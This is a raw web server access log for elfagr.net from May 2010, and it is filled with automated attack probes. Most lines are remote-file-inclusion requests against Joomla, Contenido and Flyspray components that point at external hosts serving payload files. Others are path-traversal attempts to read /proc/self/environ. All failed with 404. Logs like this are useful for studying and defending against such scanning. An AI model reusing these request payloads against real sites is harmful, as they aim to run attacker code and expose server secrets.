222.122.52.80 - - [07/May/2010:02:57:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:57:41 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:57:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:02 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:57:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:10 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:54 -0700] "GET /logs/access_090903.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:02:58:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:02:59:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:02:59:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:02:59:15 -0700] "GET /logs/access_090903.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:00:06 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:02:59:57 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:00:06 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:39 -0700] "GET /logs/access_090903.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.122.52.80 - - [07/May/2010:03:01:54 -0700] "GET /logs/access_090903.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:02:14 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:02:15 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:02:23 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:02:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:02:30 -0700] "GET /logs/access.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:02:22 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:02:56 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:03:12 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:03:04 -0700] "GET /logs/access.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.159.31.10 - - [07/May/2010:03:03:29 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.159.31.10 - - [07/May/2010:03:03:21 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.159.31.10 - - [07/May/2010:03:03:30 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:47 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:47 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:56 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:49 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:58 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:04:49 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:03:10:18 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:10:27 -0700] "GET /components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:10:27 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
220.181.94.231 - - [07/May/2010:03:12:34 -0700] "GET / HTTP/1.1" 200 1465 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.elfagr.net"
220.181.94.231 - - [07/May/2010:03:12:35 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.elfagr.net"
220.80.108.8 - - [07/May/2010:03:12:54 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
220.80.108.8 - - [07/May/2010:03:13:04 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [07/May/2010:03:13:07 -0700] "GET /ed_21.html HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:49 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:49 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:58 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:50 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:50 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:13:50 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
188.165.211.207 - - [07/May/2010:03:21:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:21:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
82.96.90.170 - - [07/May/2010:03:21:31 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.121.201.218 - - [07/May/2010:03:21:24 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:21:24 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
118.217.216.132 - - [07/May/2010:03:23:46 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "elfagr.net"
118.217.216.132 - - [07/May/2010:03:23:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "elfagr.net"
118.217.216.132 - - [07/May/2010:03:23:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "elfagr.net"
118.217.216.132 - - [07/May/2010:03:23:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "elfagr.net"
174.133.197.114 - - [07/May/2010:03:24:39 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:03:24:31 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:00 -0700] "GET /logs/access.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:00 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:09 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:05 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:05 -0700] "GET /logs/access.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:25:05 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.71.1.68 - - [07/May/2010:03:25:14 -0700] "GET /logs/access_091119.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:03:25:14 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:03:25:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:11 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:20 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:21 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:12 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:17 -0700] "GET /logs/access_100114.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:26:17 -0700] "GET /logs/access_100114.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:27:22 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:27:22 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:27:30 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:12 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:12 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:12 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:47 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:47 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
188.165.211.207 - - [07/May/2010:03:34:47 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
93.159.16.170 - - [07/May/2010:03:35:44 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://2ply.com.my/httpacces.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
93.159.16.170 - - [07/May/2010:03:35:53 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://2ply.com.my/httpacces.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
93.159.16.170 - - [07/May/2010:03:35:53 -0700] "GET /logs/access.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://2ply.com.my/httpacces.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:53 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:45 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:53 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:57 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:36:07 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:35:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:36:07 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:36:13 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:36:05 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:36:05 -0700] "GET /logs/access_100114.log////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
82.96.90.170 - - [07/May/2010:03:37:08 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
82.96.90.170 - - [07/May/2010:03:37:09 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
82.96.90.170 - - [07/May/2010:03:37:00 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
213.91.132.141 - - [07/May/2010:03:40:24 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
93.159.16.170 - - [07/May/2010:03:41:28 -0700] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://2ply.com.my/httpacces.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:41:33 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:41:33 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:41:42 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
64.106.212.19 - - [07/May/2010:03:42:51 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
64.106.212.19 - - [07/May/2010:03:42:42 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
64.106.212.19 - - [07/May/2010:03:42:42 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:43:36 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:43:36 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [07/May/2010:03:43:36 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
91.121.201.218 - - [07/May/2010:03:45:29 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.201.218 - - [07/May/2010:03:45:21 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.201.218 - - [07/May/2010:03:45:21 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
